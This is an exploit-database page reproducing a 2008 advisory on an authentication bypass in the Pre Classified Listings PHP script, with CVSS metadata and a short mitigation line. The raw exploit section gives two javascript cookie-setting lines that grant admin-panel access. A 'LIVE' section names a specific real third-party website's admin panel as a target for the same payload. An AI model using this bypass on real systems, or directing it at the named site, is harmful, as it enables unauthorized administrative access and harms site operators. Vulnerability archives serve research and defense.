header-logo
Suggest Exploit
vendor:
Pre Classified Listings PHP
by:
G4N0K
7.5
CVSS
HIGH
Insecure Cookie Handling
264
CWE
Product Name: Pre Classified Listings PHP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Pre Classified Listings PHP Insecure Cookie Handling

Pre Classified Listings PHP version is vulnerable to insecure cookie handling. An attacker can exploit this vulnerability by setting the adminname and adminid cookie values to admin. This will allow the attacker to gain access to the admin panel.

Mitigation:

Ensure that cookies are set to secure and httpOnly flags are set.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Pre Classified Listings PHP Insecure Cookie Handling
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	Pre Classified Listings PHP version
[~] Language :         	PHP
[~] Website[main]:     	http://www.preproject.com
[~] Website[script]:    http://www.preproject.com/pclphp.asp
[~] Type :             	Commercial
[~] Report-Date :     	05/11/2008
[~] Founder :			G4N0K <mail.ganok[at]gmail.com>

===============================================================================

===[ Insecure Cookie Handling ]===
Admin Panel: http://localhost/[path]/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";



===[ LIVE ]===
Admin Panel: http://www.hostnomi.net/classi/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";





===[ Greetz ]===
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-05]

Navigation

Suggest Exploit

Services By CQR